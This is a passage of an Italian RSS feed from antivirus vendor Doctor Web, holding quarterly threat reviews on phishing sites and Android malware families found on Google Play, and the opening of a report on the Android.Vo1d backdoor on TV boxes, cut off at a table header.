  &lt;p&gt;Inoltre, sono stati rilevati siti di phishing che imitavano l'aspetto esteriore del social "VKontakte". I visitatori dei siti venivano invitati a partecipare a una certa estrazione a premi aprendo a questo scopo diverse scatole con regali virtuali. Dopo che le potenziali vittime aprivano le scatole "giuste" e presumibilmente avrebbero vinto una grossa somma di denaro, il sito chiedeva loro di pagare una commissione per ricevere la "vincita".&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Il sito fraudolento invita gli utenti a "tentare la fortuna"&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;L'utente avrebbe presumibilmente vinto un premio di 194.562 rubli&lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
  &lt;/div&gt;  
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h2&gt;
  &lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2024 sui dispositivi protetti il più spesso venivano rilevati i programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che i malintenzionati utilizzano in vari schemi di frode. I secondi per la diffusione sono stati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Alla terza posizione si sono collocati i trojan &lt;b&gt;Android.Siggen&lt;/b&gt;.&lt;/p&gt;
  &lt;p&gt;Nel periodo passato i nostri specialisti hanno individuato numerose nuove minacce sullo store di app Google Play. Tra queste sono varianti diverse dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Oltre a questo, è stato registrato un attacco ai box TV con sistema operativo Android — un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, ha infettato circa 1.300.000 dispositivi appartenenti a utenti da 197 paesi. Collocava i propri componenti nell'area di sistema dei set top box e su comando dei malintenzionati poteva scaricare e installare impercettibilmente programmi di terzi.&lt;/p&gt;
  &lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in III trimestre:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;scoperta del backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; che ha infettato oltre un milione di box TV&lt;/li&gt;
    &lt;li&gt;alta attività dei programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;alta attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;,&lt;/li&gt;
    &lt;li&gt;comparsa di nuove minacce sullo store di app Google Play.  &lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel III trimestre 2024 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=14912" target="_blank" rel="noopener noreferrer"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;
</description></item><item><guid>https://news.drweb-av.it/show/?i=14912&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in III trimestre 2024</title><link>https://news.drweb-av.it/show/?i=14912&amp;lng=it&amp;c=9</link><pubDate>Tue, 01 Oct 2024 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;1 ottobre 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2024 sui dispositivi protetti venivano rilevate il più frequentemente le applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizzate dai malintenzionati in vari schemi fraudolenti. Alla seconda posizione si sono collocati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. I terzi rilevamenti più frequenti sono stati i campioni della famiglia &lt;b&gt;Android.Siggen&lt;/b&gt; — sono programmi che possiedono funzionalità malevole varie e sono difficilmente classificabili in una famiglia specifica.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Ad agosto gli specialisti Doctor Web &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14900" target="_blank" rel="noopener noreferrer"&gt;hanno scoperto un backdoor&lt;/a&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, il quale ha infettato quasi 1.300.000 box TV con SO Android appartenenti a utenti da 197 paesi del mondo. Questo programma malevolo colloca i propri componenti nell'area di sistema dei dispositivi e su comando dei malintenzionati è in grado di scaricare e installare impercettibilmente varie applicazioni.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="panoramica sull'attività di virus per dispositivi mobili in III trimestre 2024" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;

  &lt;p&gt;Allo stesso tempo, i nostri analisti dei virus di nuovo hanno identificato minacce sullo store di app Google Play. Tra queste erano molteplici nuovi programmi falsificazione, nonché diversi trojan pubblicitari.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPALI TENDENZE DI III TRIMESTRE&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Il backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; ha infettato oltre un milione di box TV&lt;/li&gt;
      &lt;li&gt;Alta attività dei programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizzati per scopi fraudolenti&lt;/li&gt;
      &lt;li&gt;Alta attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
      &lt;li&gt;Comparsa di nuovi programmi malevoli sullo store di app Google Play      &lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;Secondo i dati dei prodotti antivirus Dr.Web per Android&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.1.png" alt="Secondo i dati dei prodotti antivirus Dr.Web per Android"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7813&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programmi trojan che visualizzano annunci invadenti. Sono moduli software che gli sviluppatori software incorporano nelle applicazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojan che viene incorporato in mods dell'applicazione di messaggistica istantanea WhatsApp e si maschera da classi delle librerie di Google. Nel corso dell'utilizzo dell'applicazione vettore, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; effettua richieste a uno dei server di comando e controllo. In risposta, il trojan riceve due link, uno dei quali è destinato agli utenti di lingua russa, e il secondo a tutti gli altri utenti. Quindi visualizza una finestra di dialogo con il contenuto ricevuto dal server, e dopo che l'utente fa clic sul pulsante di conferma, carica il link corrispondente nel browser.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.1.png" alt="Secondo i dati dei prodotti antivirus Dr.Web per Android"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare abbastanza per il prelievo, non ricevono i pagamenti promessi. Con questo record anche vengono rilevati altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di programmi adware che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.1.png" alt="Secondo i dati dei prodotti antivirus Dr.Web per Android"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Questa piattaforma crea un ambiente di esecuzione virtuale nel contesto delle applicazioni in cui è incorporata. I file APK avviati tramite di esse possono funzionare come se facessero parte di tali programmi e ricevere automaticamente le stesse autorizzazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;   
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.1.png" alt="Secondo i dati dei prodotti antivirus Dr.Web per Android"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.ModAd.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle cui funzionalità è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati, ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Modulo adware che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;  
  &lt;/dl&gt;

&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Minacce su Google Play&lt;/h2&gt;

  &lt;p&gt;Nel III trimestre 2024 gli analisti dei virus Doctor Web hanno continuato a trovare minacce sullo store di app Google Play. Tra queste erano numerosi nuovi programmi malevoli falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; i quali venivano distribuiti sotto le apparenze dei più svariati software. Parte di essi i malintenzionati di nuovo spacciavano per programmi a tema finanziario — applicazioni per investimento, tutorial finanziari, variazioni delle contabilità domestiche ecc. Alcuni di questi fornivano effettivamente le funzionalità dichiarate, tuttavia, il loro obiettivo principale è quello di caricare siti truffa. Su tali siti alle potenziali vittime vengono promessi guadagni facili e veloci tramite l'investimento in azioni, il trading di materie prime, di criptovalute ecc. Con il pretesto dell'accesso al "servizio", agli utenti viene chiesto di registrare un account o fare una richiesta per la partecipazione indicando i propri dati personali.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;È interessante notare che i malintenzionati spacciavano uno dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; per un programma per incontri online e chat, però anche esso caricava un sito fraudolento con "investimenti".&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.1.png" alt="Secondo i dati dei prodotti antivirus Dr.Web per Android"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Altri trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; un'ennesima volta venivano distribuiti sotto le apparenze di giochi. A determinate condizioni, caricavano siti di casinò online e scommesse.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Tra i programmi falsificazione i nostri specialisti hanno trovato anche nuove varianti dei trojan che si camuffano da strumenti per la ricerca di lavoro. Tali programmi malevoli caricano false liste di offerte lavoro e suggeriscono alle potenziali vittime di contattare tramite app di messaggistica un datore di lavoro (in realtà, sotto questo "datore di lavoro" si nasconde il truffatore) o stendere un "curriculum" fornendo i dati personali.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Gli analisti dei virus Doctor Web hanno inoltre rilevato su Google Play ennesimi trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, che nascondono le proprie icone dal menu della schermata principale e cominciano a mostrare fastidiosi annunci pubblicitari. Si mascheravano da applicazioni di vario tipo — raccolte di immagini, app di fotoritocco, scanner di codici a barre.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/13_Android.HiddenAds.4034_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/14_Android.HiddenAds.4100_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Per proteggere i dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14900&amp;lng=it</guid><title>Il vuoto si è impadronito di oltre un milione di box TV su Android</title><link>https://news.drweb-av.it/show/?i=14900&amp;lng=it&amp;c=9</link><pubDate>Thu, 12 Sep 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 settembre 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Gli specialisti Doctor Web hanno rilevato un nuovo caso di infezione dei box TV su base Android. Un programma malevolo, denominato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, ha contagiato quasi 1.300.000 dispositivi degli utenti da 197 paesi. Questo è un backdoor che colloca i propri componenti nell'area di sistema e su comando dei malintenzionati è in grado di scaricare e installare di nascosto software di terze parti.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Ad agosto 2024 l'azienda Doctor Web è stata contattata da diversi utenti sui cui dispositivi l'antivirus Dr.Web ha rilevato modifiche nell'area dei file di sistema. Questo è successo con i seguenti modelli:&lt;/p&gt;

&lt;table class="Table"&gt;
    &lt;thead&gt;
      &lt;tr&gt;
        &lt;th&gt;Modello di box TV&lt;/th&gt;
        &lt;th&gt;Versione firmware dichiarata&lt;/th&gt;
      &lt;/tr&gt;
    &lt;/thead&gt;
